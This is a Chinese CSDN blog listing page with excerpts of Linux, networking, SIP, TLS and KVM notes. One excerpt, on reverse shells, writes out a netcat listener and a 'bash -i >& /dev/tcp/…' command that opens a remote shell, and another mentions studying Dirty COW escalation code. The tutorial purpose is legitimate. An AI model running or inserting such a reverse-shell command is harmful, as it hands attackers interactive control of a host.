自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

lyyslsw的专栏

欢迎大家评论

  • 博客(221)
  • 资源 (6)
  • 收藏
  • 关注

原创 unicode 与UTF8

unicode and utf-8

2023-01-04 13:29:22 216

原创 KVM interface passthrough

kvm 网卡passthrough

2022-06-08 13:01:02 116

原创 centos 网卡 bridge

bridge

2022-06-08 12:55:32 191

原创 KVM 创建

kvm

2022-06-08 12:52:16 153

原创 SRTP RFC 3711

目录1 SRTP session key1 SRTP session keyset key_derivation_rate = 0r = index/key_derivation_rate;if key_derivation_rate==0, r=0key_id = <label> || r;key_id = labelx = key_id XOR master salt;Key = PRF (key_id, x);其中,<label>根.

2022-01-25 15:12:24 1482

原创 centos 挂载磁盘并做磁盘加密

a) parted /dev/sdb // 选择要分区的磁盘 b) print // 磁盘信息查看 c) mklabel gpt // 创建磁盘分区表支持GPT d) mkpart primary 0% 100% e) print f) ...

2021-11-12 11:58:58 1214

原创 sr_iov kvm 网卡passthrough

#!/bin/bashtrap "" hupinterface_name=$1function analysis_nodedev_xml(){ local pci_name=$1; local target_line="" virsh nodedev-dumpxml ${pci_name} > ./${pci_name} local start_line=$(grep -rn "<iommuGroup" ./${pci_name} | awk -F...

2021-05-21 17:35:53 183

原创 ansible shiyong

ansible-playbook -i ./hosts -e @var.json deployment_abc.yml

2021-05-14 17:27:20 73

原创 openssl 计算sha256

echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJwYnh3ZWIiLCJleHAiOjE1OTg5NTc2NTEsImlhdCI6MTU5ODk1NzY0MSwiaXNzIjoicGJ4 | openssl sha -sha256 -binary -hmac key12345678 | base64

2020-09-04 16:53:54 4153

原创 AES GCM 算法

AES-GCM算法是带认证和加密的算法,也即同时可以对给定的原文,生成加密数据和认证码。加密方:plain_testkey_128/key_256iv/salt密文 = f(plain_test, key, iv)mask = f(密文, key)解密方:共享key解密方在得到密文的时候也同时得到iv原文=f(key, iv, 密文)mask' = f(key, 密文)mask' == mask ?...

2020-07-28 16:20:59 1190

原创 docker 创建

1 docker image docker login abcd.com:port (user/pwd) docker pull abcd.com:port/1234/sasasasa2 docker container 创建 docker create --hostname=docker_123_1 --name=docker_123_1--log-driver=syslog --network=host --privileged --restart=on-failur...

2020-07-10 09:22:49 126

原创 sipp basiccall xml script

1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 4 <!-- This program is free software; you can redistribute it and/or --> 5 <!--...

2020-03-04 15:13:38 291

原创 c/c++ 无符号数减法

unsigned int a = 2;unsigned int b = 3;unsigned int c = a- b;printf("%u \r\n", c);4294967295a : 补码 0x00000002b: 补码 0x00000003a-b a补 + b反 + 1 0 0 ... 0 0 0 0 0 0 1 0...

2020-02-11 20:50:53 838

原创 sipp register 脚本

1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 <!-- This program is free software; you can redistribute it and/or --> 4 <!-- ...

2020-01-20 14:12:07 491

原创 sipp basic call 脚本

1 <?xml version="1.0" encoding="ISO-8859-1" ?> 2 <!DOCTYPE scenario SYSTEM "sipp.dtd"> 3 4 <!-- This program is free software; you can redistribute it and/or --> 5 <!-...

2020-01-20 10:20:30 504

原创 base64 编码

源码序列base64序列源码序列3个字符一组, 3*8 = 24base64 序列, 4*6也即3个源码字符编为4个字符规则为依次取源码字节的bit序列的6个bit, 作为低6位, 高2位补0组成一个新的字节,这个字节用一个可打印字符表示比如新字节的大小为32, 那么新字节对应的可打印字符就是base64table[32]base64_table="AB...

2020-01-09 16:24:12 8247

原创 SIG_STOP waitpid

学习了脏牛漏洞的提权代码:子进程 被 SIG_STOP 后,他的状态变化,可以被父进程使用waitpid 捕获。( kill(getpid(), SIGSTOP);)如在在子进程里面又创建了线程, 那么子进程的这个主线程SIG_STOP后, 并不能使得子线程STOP。如果子进程一直处于STOP状态,没有被CONTINUE, 那么如果如进程退出了, 那么这个子进程会被唤醒的。...

2020-01-07 15:13:44 308

原创 linux SIGCHLD SIG_IGN

一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用 wait 或 waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵尸进程。子进程在退出时候会给父进程发送SIGCHLD 信号,1)父进程要不然会一直等待wait() ,等待子进程退出,回收资源,2) 要不父进程会异步执行其他任务, 在收到SIGCHLD 信号时候,...

2020-01-07 10:42:21 1046

原创 linux glibc malloc_trim(0)

在项目中发现进程的内存持续上升。首先确定这是不是一个内存泄露,1) gcc 的链接选项-Wl,--wrap,malloc -Wl,--wrap,free -Wl,--wrap,calloc -Wl,--wrap,realloc -Wl,--wrap,strdup -Wl,--wrap,strndup -Wl,--wrap,vasprintf 使用自己的内存池重写内存分配函数...

2020-01-03 16:24:06 5861

原创 linux /var/log/secure 安全日志

/var/log/secure 一般用来记录安全相关的信息,记录最多的是哪些用户登录服务器的相关日志,如果该文件很大,说明有人在破解你的 root 密码很多linux的新发行版已经不再使用,改为使用rsyslog。查看rsyslog的配置目录/etc/rsyslog.d...

2020-01-03 12:22:21 7158

原创 linux fork clone

fork调用的一个奇妙之处就是它仅仅被调用一次,却能够返回两次,它可能有三种不同的返回值: 1)在父进程中,fork返回新创建子进程的进程ID; 2)在子进程中,fork返回0; 3)如果出现错误,fork返回一个负值;fork()调用除了会复制父进程的所有已打开文件描述符, 还会复制父进程的缓存到子进程中.终端stdout是行缓存的普通文件的缓存是...

2020-01-02 11:07:40 121

原创 linux stat

#include <sys/stat.h>int stat(const char *file_name, struct stat *buf);通过文件名filename获取文件信息,并保存在buf所指的结构体stat中返回值: 执行成功则返回0,失败返回-1,错误代码存于errnostruct stat {dev_t st_dev; //文件的设备编号i...

2020-01-02 11:07:20 144 1

原创 linux ptrace

#include <sys/ptrace.h>long ptrace(enum _ptrace_request request,pid_t pid,void * addr ,void *data);ptrace()系统调用函数提供了一个进程(the “tracer”)监察和控制另一个进程(the “tracee”)的方法。并且可以检查和改变“tracee”进程的内存和寄存...

2020-01-02 11:06:44 208

原创 tcpdump

linux 普通用户默认是没有权限使用tcpdump的,所以需要root 用户赋权:root# setcap cap_net_raw=eip /usr/sbin/tcpdump不要为普通用户添加tcpdump的sudo权限,zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...

2019-12-30 14:04:08 966

原创 反向 shell

nc -p 4444 -lvv监听在4444端口, 监听模式, 显示命令执行过程, 假设本机IP地址10.100.125.15bash -i >& /dev/tcp/10.100.125.15/44440>&1, 假设本机IP地址为10.100.125.14bash -i : bash的交互模式当>&后面接文件时,表示将标准输...

2019-12-27 10:54:47 599

原创 linux 定时任务

cron有两个配置文件,一个是一个全局配置文件(/etc/crontab),是针对系统任务的;一组是crontab命令生成的配置文件(/var/spool/cron下的文件),是针对某个用户的.定时任务配置到任意一个中都可以。查看用户下的定时任务:example:cat /var/spool/cron/root实例1:每1分钟执行一次command  命令:***...

2019-12-25 11:22:55 127

原创 linux ping 与traceroute

ping -s 1600 -M do 10.100.125.15ip 包大小为1600, 在IP层不要分片,这样的话,中间某一个节点MTU < 1600 的话,就会ping不通.-M do 不允许分片-M want: 包大时候就分片-M donttraceroute 跟踪路由...

2019-12-23 09:04:08 465

原创 sipp uas 脚本

<?xml version="1.0" encoding="ISO-8859-1" ?><!DOCTYPE scenario SYSTEM "sipp.dtd"><!-- This program is free software; you can redistribute it and/or --><!-- modify it unde...

2019-12-19 14:45:20 690

原创 软 中断 Irqbalance

ethtool --show-ntuple em2 rx-flow-hash udp4 UDP over IPV4 flows use these fields for computing Hash flow key: IP SA IP DA Irqbalance 在均衡软中断时候,并不会将UDP的端口号作为计算哈希值的参数,所以我们的测试环境中是使用一台...

2019-12-19 08:51:52 628

原创 gdb coredump 分析堆栈

1)对linux 环境做配置,当有异常生成coredump时候,指定coredump的命名格式和路径 ulimit -S -c unlimited >/dev/null 2>&1 echo '/tmp/core_%e.%p' > /proc/sys/kernel/core_pattern ulimit -c unlimited2)定位...

2019-12-16 13:15:02 831

原创 linux 弱网环境模拟

linux 环境,1)tc qdisc adddev eth0 root netem delay 100ms 10ms 将eth0网卡的传输设置为延迟100ms ± 10ms(90 ~ 110 ms之间的任意值)发送, 所有的包2)tc qdisc adddev eth0 root netem delay 100ms 10ms 10% ...

2019-12-11 15:10:45 1562

原创 SRTP RFC4568

在传统电话业务中 SIP 信令 以及语音数据,在传输层大都使用UDP,随着电话业务的运营由运营商(移动,电信,联通)扩展到公司,到如今的云电话服务。 被服务的公司或个人越来越注重数据的安全,可选择的运营公司比较多,导致各个运营商开始实施安全的SIP 信令和语音。SIP/TLS or sipsVoice / SRTPRFC 4568 就描述了怎么在SDP中协商 媒体加密参数。因为S...

2019-12-06 16:35:53 725

转载 Linux网络流量控制工具—Netem

第一篇:概念篇Netem是Linux 2.6及以上内核版本提供的一个网络模拟功能模块。该功能模块可以用来在性能良好的局域网中,模拟出复杂的互联网传输性能,诸如低带宽、传输延迟、丢包等等情况。使用Linux 2.6(或以上)版本内核的很多发行版Linux都开启了该内核功能,比如Fedora、Ubuntu、Redhat、OpenSuse、CentOS、Debian...

2019-12-06 16:09:47 989

原创 Nginx tcp 反向代理安装配置

1)yum -y install gcc zlib zlib-devel pcre-devel openssl openssl-devel2)cd /usr/local/nginx3) wget http://nginx.org/download/nginx-1.17.5.tar.gz4) 编译 nginx ./configure --with-stream -...

2019-11-29 16:23:26 430

原创 VLAN

在上一篇中, 我们熟悉了二层交换机以及ARP。从中我们可以了解到,二层交换机下面所连接的host 都是在一个广播域内的。也就是一个端口连接的host 发送一个广播包到二层交换机上, 交换机会将这个包广播到除他之外的所有的端口。这样看来,这个广播的量就会比较大,对应的控制起来就不方便。尤其是当二层交换机之间互相连接的时候,这个广播量就更大了。(多个二层交换机相连,可以简单看做一个更多网...

2019-11-28 15:10:04 186

原创 ARP 与 二层交换机

二层交换机:交换机始终依靠着收到的包的MAC地址进行转发。那他就必须要有一个MAC地址与自己端口的映射关系。这个映射关系是通过学习知道的。比如 一台二层交换机有很多口,其中有4个口分别连着A B C D.以最常见的是ARP请求为例。A 广播 ARP 请求, 查询D的MAC地址, ARP 请求发送到 交换机后,交换机就知道了A的MAC地址,也就建立了MAC地址与端口的映...

2019-11-27 13:23:12 2195

原创 TLS 握手 与证书认证

1) TLS 握手 握手的目的就是协商出一个对称加密使用的key,用来加密后面的业务数据。 1) client 产生一个random 值 2) server 产生一个random 值, server 将签名的证书 和 random 值 以及非对称加密使用的public key 发送给client 3) client 验证证书,再产生...

2019-11-18 18:05:56 1106

原创 SIP 鉴权 & HTTP 认证

sip 鉴权是基于摘要签名认证的,具体来说:每一个用户都有一个用户名和密码,用户名和密码在客户端和SIP 服务器的数据库中都有保存。在认证的过程中, 客户端将自己的信息(用户名 密码 url 等信息) 做一些复杂的MD5 或者SHA256/SHA512 签名,这个签名给SIP server, SIP server 也会用相同的信息计算签名, 结果一样就认为发送消息的用户是真正合法的用户。...

2019-11-15 14:06:11 1748

原创 SIP DTMF

SIP DTMF 有三种方式1) 带外方式, 也就是指传DTMF信号不走RTP, 通过信令的方式。用的比较多的是 sip INFO消息传输。2) 带内方式 a) 直接把DTMF 信息当做语音信号处理,但是他和语音的频率不同,在接收端可以根据频率把这16个电话按键区分出来。 但是不是所有的Codec都能够携带DTMF, G729 好像就不可以携带DTM...

2019-08-05 10:55:49 1624

原创 TLS

http://www.mamicode.com/info-detail-1846390.html对称加密:在对称加密中,数据发送方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。接收方收到密文后,若想解读原文,则需要使用加密密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数...

2018-11-29 11:06:45 474

linux 下知识点汇总

linux 下知识点汇总

2023-01-10

git config 配置包含将git的默认编辑器修改为vim

git config 配置 包含将git的默认编辑器修改为vim

2022-11-23

vim 配置文件,包含作为git merge 工具时候的配置文件

vim 配置文件,包含作为git merge 工具时候的配置文件

2022-11-23

ffmpeg 学习 笔记 文档 杂记

ffmpeg学习笔记文档

2022-10-15

linux 常用命令总结

linux 常用命令总结

2022-09-15

redis cmd 学习笔记

redis cmd 学习笔记

2022-08-23

git cmd in linux

git cmd in linux

2022-08-08

linux 运维命令总结

linux 运维命令总结

2022-06-08

tcpdump 源代码安装包

抓包软件 example: tcpdump -i eth0 -s 0 -w abc.pcap

2017-10-14

高清 TCP/IP 协议详解 卷一

高清PDF格式 TCP/IP 协议详解 真的不错啊

2014-06-30

resiprocate 日志文档

对resiprocate客户端与代理服务器理解的log,通过此log 清楚的理解sip协议。适合初学者

2013-01-04

xmpp 客户端与服务器

类似于xmpp协议的服务器与客户端代码。具体自己看

2011-08-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除